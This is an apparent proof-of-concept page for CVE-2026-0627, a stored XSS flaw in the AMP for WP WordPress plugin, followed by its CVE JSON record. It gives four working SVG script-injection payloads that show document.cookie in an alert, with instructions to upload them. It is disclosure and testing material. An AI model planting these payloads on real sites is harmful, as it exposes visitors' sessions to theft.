CVE-2026-0627

<!-- CVE-2026-0627 PoC - Malicious SVG file for AMP for WP XSS --> <!-- Save this as malicious.svg and upload via AMP for WP plugin --> <!-- Method 1: Using onload event handler --> <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"> <rect width="100" height="100" fill="red"/> </svg> <!-- Method 2: Using foreignObject to embed HTML/JS --> <svg xmlns="http://www.w3.org/2000/svg"> <foreignObject width="200" height="200"> <div xmlns="http://www.w3.org/1999/xhtml"> <script>alert(document.cookie)</script> </div> </foreignObject> </svg> <!-- Method 3: Using animate element onbegin event --> <svg xmlns="http://www.w3.org/2000/svg"> <animate onbegin="alert(document.domain)" attributeName="x" dur="1s" fill="freeze"/> <rect x="0" y="0" width="100" height="100"/> </svg> <!-- Method 4: Using set element to modify href --> <svg xmlns="http://www.w3.org/2000/svg"> <a id="xlink"> <set attributeName="xlink:href" to="javascript:alert(document.cookie)"/> <text y="20">Click me</text> </a> </svg>

{"cve": {"id": "CVE-2026-0627", "sourceIdentifier": "[email protected]", "published": "2026-01-09T09:15:47.883", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AMP for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file uploads in all versions up to, and including, 1.1.10. This is due to insufficient sanitization of SVG file content that only removes `<script>` tags while allowing other XSS vectors such as event handlers (onload, onerror, onmouseover), foreignObject elements, and SVG animation attributes. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts via malicious SVG file uploads that will execute whenever a user views the uploaded file."}, {"lang": "es", "value": "El plugin AMP for WP para WordPress es vulnerable a cross-site scripting almacenado a través de cargas de archivos SVG en todas las versiones hasta la 1.1.10, inclusive. Esto se debe a una sanitización insuficiente del contenido de los archivos SVG que solo elimina las etiquetas `"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.1.10/templates/features.php#L10373", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/trunk/templates/features.php#L10373", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3434946/accelerated-mobile-pages/trunk/templates/features.php?old=3426181&old_path=accelerated-mobile-pages%2Ftrunk%2Ftemplates%2Ffeatures.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4ed23318-3b47-4336-a3aa-6b09f3911926?source=cve", "source": "[email protected]"}]}}